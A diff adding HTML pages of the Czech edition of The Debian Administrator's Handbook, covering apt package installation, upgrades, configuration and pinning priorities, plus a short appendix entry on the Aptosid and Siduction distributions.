+                class="literal">Recommends</code>. In general, the dependency solver will use that information as a hint to look for alternative solutions.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">apt --reinstall</code> and <code
+                        class="command">aptitude reinstall</code></strong></p></div></div></div><a
+              id="id-1.9.11.9.18.2"
+              class="indexterm"></a><div
+              class="para">
+				The system can sometimes be damaged after the removal or modification of files in a package. The easiest way to retrieve these files is to reinstall the affected package. Unfortunately, the packaging system finds that the latter is already installed and politely refuses to reinstall it; to avoid this, use the <code
+                class="literal">--reinstall</code> option of the <code
+                class="command">apt</code> and <code
+                class="command">apt-get</code> commands. The following command reinstalls <span
+                class="pkg pkg">postfix</span> even if it is already present:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt --reinstall install postfix</code></strong></pre><div
+              class="para">
+				The <code
+                class="command">aptitude</code> command line is slightly different, but achieves the same result with <code
+                class="command">aptitude reinstall postfix</code>.
+			</div><div
+              class="para">
+				The problem does not arise with <code
+                class="command">dpkg</code>, but the administrator rarely uses it directly.
+			</div><div
+              class="para">
+				Be careful! Using <code
+                class="command">apt --reinstall</code> to restore packages modified during an attack will certainly not recover the system as it was. <a
+                class="xref"
+                href="sect.dealing-with-compromised-machine.html">14.7 – „Dealing with a Compromised Machine“</a> details the necessary steps to take with a compromised system.
+			</div></div><div
+            class="para">
+				If the file <code
+              class="filename">sources.list</code> mentions several distributions, it is possible to give the version of the package to install. A specific version number can be requested with <code
+              class="command">apt install <em
+                class="replaceable">package</em>=<em
+                class="replaceable">version</em></code>, but indicating its distribution of origin (<span
+              class="distribution distribution">Stable</span>, <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span>) — with <code
+              class="command">apt install <em
+                class="replaceable">package</em>/<em
+                class="replaceable">distribution</em></code> — is usually preferred. With this command, it is possible to go back to an older version of a package (if for instance you know that it works well), provided that it is still available in one of the sources referenced by the <code
+              class="filename">sources.list</code> file. Otherwise the <code
+              class="literal">snapshot.debian.org</code> archive can come to the rescue (see sidebar <a
+              class="xref"
+              href="apt.html#sidebar.snapshot.debian.org"><span
+                class="emphasis"><em>GOING FURTHER</em></span> Old package versions: <code
+                class="literal">snapshot.debian.org</code></a>).
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.9.11.9.20"></a><p
+              class="title"><strong>Příklad 6.3. Installation of the <span
+                  class="distribution distribution">unstable</span> version of <span
+                  class="pkg pkg">spamassassin</span></strong></p><div
+              class="example-contents"><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>apt install spamassassin/unstable</code></strong></pre></div></div><div
+            class="para">
+				If the package to install has been made available to you under the form of a simple <code
+              class="filename">.deb</code> file without any associated package repository, it is still possible to use APT to install it together with its dependencies (provided that the dependencies are available in the configured repositories) with a simple command: <code
+              class="command">apt install ./<em
+                class="replaceable">path-to-the-package.deb</em></code>. The leading <code
+              class="literal">./</code> is important to make it clear that we are referring to a filename and not to the name of a package available in one of the repositories.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> The cache of <code
+                        class="filename">.deb</code> files</strong></p></div></div></div><div
+              class="para">
+				APT keeps a copy of each downloaded <code
+                class="filename">.deb</code> file in the directory <code
+                class="filename">/var/cache/apt/archives/</code>. In case of frequent updates, this directory can quickly take a lot of disk space with several versions of each package; you should regularly sort through them. Two commands can be used: <code
+                class="command">apt-get clean</code> entirely empties the directory; <code
+                class="command">apt-get autoclean</code> only removes packages which can no longer be downloaded (because they have disappeared from the Debian mirror) and are therefore clearly useless (the configuration parameter <code
+                class="literal">APT::Clean-Installed</code> can prevent the removal of <code
+                class="filename">.deb</code> files that are currently installed).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-upgrade"></a>6.2.3. System Upgrade</h3></div></div></div><a
+            id="id-1.9.11.10.2"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.5"
+            class="indexterm"></a><div
+            class="para">
+				Regular upgrades are recommended, because they include the latest security updates. To upgrade, use <code
+              class="command">apt upgrade</code>, <code
+              class="command">apt-get upgrade</code> or <code
+              class="command">aptitude safe-upgrade</code> (of course after <code
+              class="command">apt update</code>). This command looks for installed packages which can be upgraded without removing any packages. In other words, the goal is to ensure the least intrusive upgrade possible. <code
+              class="command">apt-get</code> is slightly more demanding than <code
+              class="command">aptitude</code> or <code
+              class="command">apt</code> because it will refuse to install packages which were not installed beforehand.
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.apt-pdiff"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Incremental upgrade</strong></p></div></div></div><div
+              class="para">
+				As we explained earlier, the aim of the <code
+                class="command">apt update</code> command is to download for each package source the corresponding <code
+                class="filename">Packages</code> (or <code
+                class="filename">Sources</code>) file. However, even after a <code
+                class="command">xz</code> compression, these files can remain rather large (the <code
+                class="filename">Packages.xz</code> for the <span
+                class="foreignphrase"><em
+                  class="foreignphrase">main</em></span> section of <span
+                class="distribution distribution">Stretch</span> takes more than 6 MB). If you wish to upgrade regularly, these downloads can take up a lot of time.
+			</div><div
+              class="para">
+				To speed up the process APT can download “diff” files containing the changes since the previous update, as opposed to the entire file. To achieve this, official Debian mirrors distribute different files which list the differences between one version of the <code
+                class="filename">Packages</code> file and the following version. They are generated at each update of the archives and a history of one week is kept. Each of these “diff” files only takes a few dozen kilobytes for <span
+                class="distribution distribution">Unstable</span>, so that the amount of data downloaded by a weekly <code
+                class="command">apt update</code> is often divided by 10. For distributions like <span
+                class="distribution distribution">Stable</span> and <span
+                class="distribution distribution">Testing</span>, which change less, the gain is even more noticeable.
+			</div><div
+              class="para">
+				However, it can sometimes be of interest to force the download of the entire <code
+                class="filename">Packages</code> file, especially when the last upgrade is very old and when the mechanism of incremental differences would not contribute much. This can also be interesting when network access is very fast but when the processor of the machine to upgrade is rather slow, since the time saved on the download is more than lost when the computer calculates the new versions of these files (starting with the older versions and applying the downloaded differences). To do that, you can use the configuration parameter <code
+                class="literal">Acquire::Pdiffs</code> and set it to <code
+                class="literal">false</code>.
+			</div></div><div
+            class="para">
+				<code
+              class="command">apt</code> will generally select the most recent version number (except for packages from <span
+              class="distribution distribution">Experimental</span> and <span
+              class="distribution distribution">stable-backports</span>, which are ignored by default whatever their version number). If you specified <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span> in your <code
+              class="filename">sources.list</code>, <code
+              class="command">apt upgrade</code> will switch most of your <span
+              class="distribution distribution">Stable</span> system to <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span>, which might not be what you intended.
+			</div><div
+            class="para">
+				To tell <code
+              class="command">apt</code> to use a specific distribution when searching for upgraded packages, you need to use the <code
+              class="literal">-t</code> or <code
+              class="literal">--target-release</code> option, followed by the name of the distribution you want (for example: <code
+              class="command">apt -t stable upgrade</code>). To avoid specifying this option every time you use <code
+              class="command">apt</code>, you can add <code
+              class="literal">APT::Default-Release "stable";</code> in the file <code
+              class="filename">/etc/apt/apt.conf.d/local</code>.
+			</div><a
+            id="id-1.9.11.10.10"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.11"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.12"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.13"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.14"
+            class="indexterm"></a><div
+            class="para">
+				For more important upgrades, such as the change from one major Debian version to the next, you need to use <code
+              class="command">apt full-upgrade</code>. With this instruction, <code
+              class="command">apt</code> will complete the upgrade even if it has to remove some obsolete packages or install new dependencies. This is also the command used by users who work daily with the Debian <span
+              class="distribution distribution">Unstable</span> release and follow its evolution day by day. It is so simple that it hardly needs explanation: APT's reputation is based on this great functionality.
+			</div><div
+            class="para">
+				Unlike <code
+              class="command">apt</code> and <code
+              class="command">aptitude</code>, <code
+              class="command">apt-get</code> doesn't know the <code
+              class="command">full-upgrade</code> command. Instead, you should use <code
+              class="command">apt-get dist-upgrade</code> (”distribution upgrade”), the historical and well-known command that <code
+              class="command">apt</code> and <code
+              class="command">aptitude</code> also accept for the convenience of users who got used to it.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-config"></a>6.2.4. Configuration Options</h3></div></div></div><a
+            id="id-1.9.11.11.2"
+            class="indexterm"></a><a
+            id="id-1.9.11.11.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.11.4"
+            class="indexterm"></a><div
+            class="para">
+				Besides the configuration elements already mentioned, it is possible to configure certain aspects of APT by adding directives in a file of the <code
+              class="filename">/etc/apt/apt.conf.d/</code> directory. Remember for instance that it is possible for APT to tell <code
+              class="command">dpkg</code> to ignore file conflict errors by specifying <code
+              class="literal">DPkg::options { "--force-overwrite"; }</code>.
+			</div><div
+            class="para">
+				If the Web can only be accessed through a proxy, add a line like <code
+              class="literal">Acquire::http::proxy "http://<em
+                class="replaceable">yourproxy</em>:3128"</code>. For an FTP proxy, write <code
+              class="literal">Acquire::ftp::proxy "ftp://<em
+                class="replaceable">yourproxy</em>"</code>. To discover more configuration options, read the <span
+              class="citerefentry"><span
+                class="refentrytitle">apt.conf</span>(5)</span> manual page with the <code
+              class="command">man apt.conf</code> command (for details on manual pages, see <a
+              class="xref"
+              href="solving-problems.html#sect.manual-pages">7.1.1 – „Manual Pages“</a>).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.directory.d"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Directories ending in <code
+                        class="filename">.d</code></strong></p></div></div></div><a
+              id="id-1.9.11.11.7.2"
+              class="indexterm"></a><div
+              class="para">
+				Directories with a <code
+                class="filename">.d</code> suffix are used more and more often. Each directory represents a configuration file which is split over multiple files. In this sense, all of the files in <code
+                class="filename">/etc/apt/apt.conf.d/</code> are instructions for the configuration of APT. APT includes them in alphabetical order, so that the last ones can modify a configuration element defined in one of the first ones.
+			</div><div
+              class="para">
+				This structure brings some flexibility to the machine administrator and to the package maintainers. Indeed, the administrator can easily modify the configuration of the software by adding a ready-made file in the directory in question without having to change an existing file. Package maintainers use the same approach when they need to adapt the configuration of another software to ensure that it perfectly co-exists with theirs. The Debian policy explicitly forbids modifying configuration files of other packages — only users are allowed to do this. Remember that during a package upgrade, the user gets to choose the version of the configuration file that should be kept when a modification has been detected. Any external modification of the file would trigger that request, which would disturb the administrator, who is sure not to have changed anything.
+			</div><div
+              class="para">
+				Without a <code
+                class="filename">.d</code> directory, it is impossible for an external package to change the settings of a program without modifying its configuration file. Instead it must invite the user to do it themselves and lists the operations to be done in the file <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/README.Debian</code>.
+			</div><div
+              class="para">
+				Depending on the application, the <code
+                class="filename">.d</code> directory is used directly or managed by an external script which will concatenate all the files to create the configuration file itself. It is important to execute the script after any change in that directory so that the most recent modifications are taken into account. In the same way, it is important not to work directly in the configuration file created automatically, since everything would be lost at the next execution of the script. The chosen method (<code
+                class="filename">.d</code> directory used directly or a file generated from that directory) is usually dictated by implementation constraints, but in both cases the gains in terms of configuration flexibility more than make up for the small complications that they entail. The Exim 4 mail server is an example of the generated file method: it can be configured through several files (<code
+                class="filename">/etc/exim4/conf.d/*</code>) which are concatenated into <code
+                class="filename">/var/lib/exim4/config.autogenerated</code> by the <code
+                class="command">update-exim4.conf</code> command.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt.priorities"></a>6.2.5. Managing Package Priorities</h3></div></div></div><div
+            class="para">
+				One of the most important aspects in the configuration of APT is the management of the priorities associated with each package source. For instance, you might want to extend one distribution with one or two newer packages from <span
+              class="distribution distribution">Testing</span>, <span
+              class="distribution distribution">Unstable</span> or <span
+              class="distribution distribution">Experimental</span>. It is possible to assign a priority to each available package (the same package can have several priorities depending on its version or the distribution providing it). These priorities will influence APT's behavior: for each package, it will always select the version with the highest priority (except if this version is older than the installed one and if its priority is less than 1000).
+			</div><a
+            id="id-1.9.11.12.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.5"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.6"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.7"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.8"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.9"
+            class="indexterm"></a><div
+            class="para">
+				APT defines several default priorities. Each installed package version has a priority of 100. A non-installed version has a priority of 500 by default, but it can jump to 990 if it is part of the target release (defined with the <code
+              class="literal">-t</code> command-line option or the <code
+              class="literal">APT::Default-Release</code> configuration directive).
+			</div><div
+            class="para">
+				You can modify the priorities by adding entries in the <code
+              class="filename">/etc/apt/preferences</code> file with the names of the affected packages, their version, their origin and their new priority.
+			</div><div
+            class="para">
+				APT will never install an older version of a package (that is, a package whose version number is lower than the one of the currently installed package) except if its priority is higher than 1000. APT will always install the highest priority package which follows this constraint. If two packages have the same priority, APT installs the newest one (whose version number is the highest). If two packages of same version have the same priority but differ in their content, APT installs the version that is not installed (this rule has been created to cover the case of a package update without the increment of the revision number, which is usually required).
+			</div><div
+            class="para">
+				In more concrete terms, a package whose priority is less than 0 will never be installed. A package with a priority ranging between 0 and 100 will only be installed if no other version of the package is already installed. With a priority between 100 and 500, the package will only be installed if there is no other newer version installed or available in another distribution. A package of priority between 501 and 990 will only be installed if there is no newer version installed or available in the target distribution. With a priority between 990 and 1000, the package will be installed except if the installed version is newer. A priority greater than 1000 will always lead to the installation of the package even if it forces APT to downgrade to an older version.
+			</div><div
+            class="para">
+				When APT checks <code
+              class="filename">/etc/apt/preferences</code>, it first takes into account the most specific entries (often those specifying the concerned package), then the more generic ones (including for example all the packages of a distribution). If several generic entries exist, the first match is used. The available selection criteria include the package's name and the source providing it. Every package source is identified by the information contained in a <code
+              class="filename">Release</code> file that APT downloads together with the <code
+              class="filename">Packages</code> files. It specifies the origin (usually “Debian” for the packages of official mirrors, but it can also be a person's or an organization's name for third-party repositories). It also gives the name of the distribution (usually <span
+              class="distribution distribution">Stable</span>, <span
+              class="distribution distribution">Testing</span>, <span
+              class="distribution distribution">Unstable</span> or <span
+              class="distribution distribution">Experimental</span> for the standard distributions provided by Debian) together with its version (for example 9 for Debian <span
+              class="distribution distribution">Stretch</span>). Let's have a look at its syntax through some realistic case studies of this mechanism.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SPECIFIC CASE</em></span> Priority of <span
+                        class="distribution distribution">experimental</span></strong></p></div></div></div><a
+              id="id-1.9.11.12.15.2"
+              class="indexterm"></a><div
+              class="para">
+				If you listed <span
+                class="distribution distribution">Experimental</span> in your <code
+                class="filename">sources.list</code> file, the corresponding packages will almost never be installed because their default APT priority is 1. This is of course a specific case, designed to keep users from installing <span
+                class="distribution distribution">Experimental</span> packages by mistake. The packages can only be installed by typing <code
+                class="command">aptitude install <em
+                  class="replaceable">package</em>/experimental</code> — users typing this command can only be aware of the risks that they take. It is still possible (though <span
+                class="emphasis"><em>not</em></span> recommended) to treat packages of <span
+                class="distribution distribution">Experimental</span> like those of other distributions by giving them a priority of 500. This is done with a specific entry in <code
+                class="filename">/etc/apt/preferences</code>:
+			</div><div
+              class="informalexample"><pre
+                class="programlisting">Package: *
+Pin: release a=experimental
+Pin-Priority: 500
+</pre></div></div><div
+            class="para">
+				Let's suppose that you only want to use packages from the stable version of Debian. Those provided in other versions should not be installed except if explicitly requested. You could write the following entries in the <code
+              class="filename">/etc/apt/preferences</code> file:
+			</div><div
+            class="informalexample"><pre
+              class="programlisting">Package: *
+Pin: release a=stable
+Pin-Priority: 900
+
+Package: *
+Pin: release o=Debian
+Pin-Priority: -10
+</pre></div><div
+            class="para">
+				<code
+              class="literal">a=stable</code> defines the name of the selected distribution. <code
+              class="literal">o=Debian</code> limits the scope to packages whose origin is “Debian”.
+			</div><div
+            class="para">
+				Let's now assume that you have a server with several local programs depending on the version 5.24 of Perl and that you want to ensure that upgrades will not install another version of it. You could use this entry:
+			</div><div
+            class="informalexample"><pre
+              class="programlisting">Package: perl
+Pin: version 5.24*
+Pin-Priority: 1001
+</pre></div><div
+            class="para">
+				The reference documentation for this configuration file is available in the manual page <span
+              class="citerefentry"><span
+                class="refentrytitle">apt_preferences</span>(5)</span>, which you can display with <code
+              class="command">man apt_preferences</code>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Comments in <code
+                        class="filename">/etc/apt/preferences</code></strong></p></div></div></div><a
+              id="id-1.9.11.12.22.2"
+              class="indexterm"></a><a
+              id="id-1.9.11.12.22.3"
+              class="indexterm"></a><a
+              id="id-1.9.11.12.22.4"
+              class="indexterm"></a><div
+              class="para">
+				There is no official syntax to put comments in the <code
+                class="filename">/etc/apt/preferences</code> file, but some textual descriptions can be provided by putting one or more “<code
+                class="literal">Explanation</code>” fields at the start of each entry:
+			</div><div
+              class="informalexample"><pre
+                class="programlisting">Explanation: The package xserver-xorg-video-intel provided
+Explanation: in experimental can be used safely
+Package: xserver-xorg-video-intel
+Pin: release a=experimental
+Pin-Priority: 500
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-mix-distros"></a>6.2.6. Working with Several Distributions</h3></div></div></div><div
+            class="para">
+				<code
+              class="command">apt</code> being such a marvelous tool, it is tempting to pick packages coming from other distributions. For example, after having installed a <span
+              class="distribution distribution">Stable</span> system, you might want to try out a software package available in <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span> without diverging too much from the system's initial state.
+			</div><div
+            class="para">
+				Even if you will occasionally encounter problems while mixing packages from different distributions, <code
+              class="command">apt</code> manages such coexistence very well and limits risks very effectively. The best way to proceed is to list all distributions used in <code
+              class="filename">/etc/apt/sources.list</code> (some people always put the three distributions, but remember that <span
+              class="distribution distribution">Unstable</span> is reserved for experienced users) and to define your reference distribution with the <code
+              class="literal">APT::Default-Release</code> parameter (see <a
+              class="xref"
+              href="sect.apt-get.html#sect.apt-upgrade">6.2.3 – „System Upgrade“</a>).
+			</div><div
+            class="para">
+				Let's suppose that <span
+              class="distribution distribution">Stable</span> is your reference distribution but that <span
+              class="distribution distribution">Testing</span> and <span
+              class="distribution distribution">Unstable</span> are also listed in your <code
+              class="filename">sources.list</code> file. In this case, you can use <code
+              class="command">apt install <em
+                class="replaceable">package</em>/testing</code> to install a package from <span
+              class="distribution distribution">Testing</span>. If the installation fails due to some unsatisfiable dependencies, let it solve those dependencies within <span
+              class="distribution distribution">Testing</span> by adding the <code
+              class="literal">-t testing</code> parameter. The same obviously applies to <span
+              class="distribution distribution">Unstable</span>.
+			</div><div
+            class="para">
+				In this situation, upgrades (<code
+              class="command">upgrade</code> and <code
+              class="command">full-upgrade</code>) are done within <span
+              class="distribution distribution">Stable</span> except for packages already upgraded to another distribution: those will follow updates available in the other distributions. We will explain this behavior with the help of the default priorities set by APT below. Do not hesitate to use <code
+              class="command">apt-cache policy</code> (see sidebar <a
+              class="xref"
+              href="sect.apt-get.html#sidebar.apt-cache-policy"><span
+                class="emphasis"><em>TIP</em></span> <code
+                class="command">apt-cache policy</code></a>) to verify the given priorities.
+			</div><div
+            class="para">
+				Everything centers around the fact that APT only considers packages of higher or equal version than the installed one (assuming that <code
+              class="filename">/etc/apt/preferences</code> has not been used to force priorities higher than 1000 for some packages).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.apt-cache-policy"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">apt-cache policy</code></strong></p></div></div></div><div
+              class="para">
+				To gain a better understanding of the mechanism of priority, do not hesitate to execute <code
+                class="command">apt-cache policy</code> to display the default priority associated with each package source. You can also use <code
+                class="command">apt-cache policy <em
+                  class="replaceable">package</em></code> to display the priorities of all available versions of a given package.
+			</div></div><div
+            class="para">
+				Let's assume that you have installed version 1 of a first package from <span
+              class="distribution distribution">Stable</span> and that version 2 and 3 are available respectively in <span
+              class="distribution distribution">Testing</span> and <span
+              class="distribution distribution">Unstable</span>. The installed version has a priority of 100 but the version available in <span
+              class="distribution distribution">Stable</span> (the very same) has a priority of 990 (because it is part of the target release). Packages in <span
+              class="distribution distribution">Testing</span> and <span
+              class="distribution distribution">Unstable</span> have a priority of 500 (the default priority of a non-installed version). The winner is thus version 1 with a priority of 990. The package “stays in <span
+              class="distribution distribution">Stable</span>”.
+			</div><div
+            class="para">
+				Let's take the example of another package whose version 2 has been installed from <span
+              class="distribution distribution">Testing</span>. Version 1 is available in <span
+              class="distribution distribution">Stable</span> and version 3 in <span
+              class="distribution distribution">Unstable</span>. Version 1 (of priority 990 — thus lower than 1000) is discarded because it is lower than the installed version. This only leaves version 2 and 3, both of priority 500. Faced with this alternative, APT selects the newest version, the one from <span
+              class="distribution distribution">Unstable</span>.If you don't want a package installed from <span
+              class="distribution distribution">Testing</span> to migrate to <span
+              class="distribution distribution">Unstable</span>, you have to assign a priority lower than 500 (490 for example) to packages coming from <span
+              class="distribution distribution">Unstable</span>. You can modify <code
+              class="filename">/etc/apt/preferences</code> to this effect:
+			</div><pre
+            class="programlisting">Package: *
+Pin: release a=unstable
+Pin-Priority: 490
+</pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.automatic-tracking"></a>6.2.7. Tracking Automatically Installed Packages</h3></div></div></div><div
+            class="para">
+				One of the essential functionalities of <code
+              class="command">apt</code> is the tracking of packages installed only through dependencies. These packages are called “automatic”, and often include libraries for instance.
+			</div><div
+            class="para">
+				With this information, when packages are removed, the package managers can compute a list of automatic packages that are no longer needed (because there is no “manually installed” packages depending on them). <code
+              class="command">apt-get autoremove</code> or <code
+              class="command">apt autoremove</code> will get rid of those packages. <code
+              class="command">aptitude</code> does not have this command because it removes them automatically as soon as they are identified. In all cases, the tools display a clear message listing the affected packages.
+			</div><a
+            id="id-1.9.11.14.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.14.5"
+            class="indexterm"></a><a
+            id="id-1.9.11.14.6"
+            class="indexterm"></a><a
+            id="id-1.9.11.14.7"
+            class="indexterm"></a><div
+            class="para">
+				It is a good habit to mark as automatic any package that you don't need directly so that they are automatically removed when they aren't necessary anymore. <code
+              class="command">apt-mark auto <em
+                class="replaceable">package</em></code> will mark the given package as automatic whereas <code
+              class="command">apt-mark manual <em
+                class="replaceable">package</em></code> does the opposite. <code
+              class="command">aptitude markauto</code> and <code
+              class="command">aptitude unmarkauto</code> work in the same way although they offer more features for marking many packages at once (see <a
+              class="xref"
+              href="sect.apt-frontends.html#sect.aptitude">6.4.1 – „<code
+                class="command">aptitude</code>“</a>). The console-based interactive interface of <code
+              class="command">aptitude</code> also makes it easy to review the “automatic flag” on many packages.
+			</div><a
+            id="id-1.9.11.14.9"
+            class="indexterm"></a><div
+            class="para">
+				People might want to know why an automatically installed package is present on the system. To get this information from the command line, you can use <code
+              class="command">aptitude why <em
+                class="replaceable">package</em></code> (<code
+              class="command">apt</code> and <code
+              class="command">apt-get</code> have no similar feature):
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>aptitude why python-debian
+</code></strong><code
+              class="computeroutput">i   aptitude         Recommends apt-xapian-index         
+i A apt-xapian-index Depends    python-debian (&gt;= 0.1.15)
+</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> <code
+                        class="command">deborphan</code> and <code
+                        class="command">debfoster</code></strong></p></div></div></div><a
+              id="id-1.9.11.14.12.2"
+              class="indexterm"></a><a
+              id="id-1.9.11.14.12.3"
+              class="indexterm"></a><div
+              class="para">
+				In days where <code
+                class="command">apt</code>, <code
+                class="command">apt-get</code> and <code
+                class="command">aptitude</code> were not able to track automatic packages, there were two utilities producing lists of unnecessary packages: <code
+                class="command">deborphan</code> and <code
+                class="command">debfoster</code>.
+			</div><div
+              class="para">
+				<code
+                class="command">deborphan</code> is the most rudimentary of both. It simply scans the <code
+                class="literal">libs</code> and <code
+                class="literal">oldlibs</code> sections (in the absence of supplementary instructions) looking for the packages that are currently installed and that no other package depends on. The resulting list can then serve as a basis to remove unneeded packages.
+			</div><div
+              class="para">
+				<code
+                class="command">debfoster</code> has a more elaborate approach, very similar to APT's one: it maintains a list of packages that have been explicitly installed, and remembers what packages are really required between each invocation. If new packages appear on the system and if <code
+                class="command">debfoster</code> doesn't know them as required packages, they will be shown on the screen together with a list of their dependencies. The program then offers a choice: remove the package (possibly together with those that depend on it), mark it as explicitly required, or ignore it temporarily.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="apt.html"><strong>Předcházející</strong>Kapitola 6. Maintenance and Updates: The APT Tools</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-cache.html"><strong>Další</strong>6.3. The apt-cache Command</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html
new file mode 100644
index 000000000..643bdd3a6
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.aptosid.html
@@ -0,0 +1,97 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.5. Aptosid and Siduction</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.knoppix.html"
+        title="A.4. Knoppix" /><link
+        rel="next"
+        href="sect.grml.html"
+        title="A.6. Grml" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.aptosid.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.knoppix.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.grml.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.aptosid"></a>A.5. Aptosid and Siduction</h2></div></div></div><a
+          id="id-1.20.8.2"
+          class="indexterm"></a><a
+          id="id-1.20.8.3"
+          class="indexterm"></a><a
+          id="id-1.20.8.4"
+          class="indexterm"></a><div
+          class="para">
+			These community-based distributions track the changes in Debian <span
+            class="distribution distribution">Sid</span> (<span
+            class="distribution distribution">Unstable</span>) — hence their name. The modifications are limited in scope: the goal is to provide the most recent software and to update drivers for the most recent hardware, while still allowing users to switch back to the official Debian distribution at any time. Aptosid was previously known as Sidux, and Siduction is a more recent fork of Aptosid. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://aptosid.com">http://aptosid.com</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://siduction.org">http://siduction.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.knoppix.html"><strong>Předcházející</strong>A.4. Knoppix</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.grml.html"><strong>Další</strong>A.6. Grml</a></li></ul></body></html>
